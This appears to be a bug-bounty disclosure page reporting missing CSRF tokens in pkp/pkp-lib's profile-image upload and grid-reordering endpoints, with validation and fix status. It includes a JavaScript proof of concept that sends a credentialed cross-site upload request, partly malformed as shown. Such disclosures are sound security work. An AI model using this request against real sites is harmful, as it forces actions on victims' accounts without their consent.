Cross-Site Request Forgery (CSRF) in pkp/pkp-lib


Reported on

Oct 16th 2021


No CSRF in upload profile too: /index.php/e/$$$call$$$/tab/user/profile-tab/upload-profile-image.

More endpoints:

Reordering data:



POC for upload files

        var xhr = new XMLHttpRequest();"POST", "$$$call$$$/tab/user/profile-tab/upload-profile-image", true);
        xhr.setRequestHeader("Accept", "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8");
        xhr.setRequestHeader("Accept-Language", "de-de,de;q=0.8,en-us;q=0.5,en;q=0.3");
        xhr.setRequestHeader("Content-Type", "multipart/form-data; boundary=---------------------------moxieboundary1634260375680");
        xhr.withCredentials = "true";
        var body = "-----------------------------moxieboundary1634260375680\r\n" +
          "Content-Disposition: form-data; name=\"name\"\r\n" +
          "\r\n" + "cat.jpg" +
          "\r\n" +
          "-----------------------------moxieboundary1634260375680\r\n" +
          "Content-Disposition: form-data; name=\"uploadedFile\"; ; filename=\"cat.jpg\"\r\n" + 
          "Content-Type: text/xml\r\n" +
          "\r\n" +
          "[FILE_CONTENT_HERE]" + "\r\n" +
        var aBody = new Uint8Array(body.length);
        for (var i = 0; i < aBody.length; i++)
          aBody[i] = body.charCodeAt(i);
        xhr.send(new Blob([aBody]));


This vulnerability is capable of tricking users to change their user profile picture.


no token in the upload profile frontend

no token in the upload profile backend

no token in save category grid sequence backend

no token in the save grid sequence backend

We have contacted a member of the pkp/pkp-lib team and are waiting to hear back 2 years ago
haxatron modified the report
2 years ago
Alec Smecher validated this vulnerability 2 years ago
haxatron has been awarded the disclosure bounty
The fix bounty is now up for grabs
Alec Smecher marked this as fixed with commit 169885 2 years ago
Alec Smecher has been awarded the fix bounty
This vulnerability will not receive a CVE
Alec Smecher
2 years ago


Note that the two CSRF checks are added in separate commits; I flagged one of them as the fix. Both are:

to join this conversation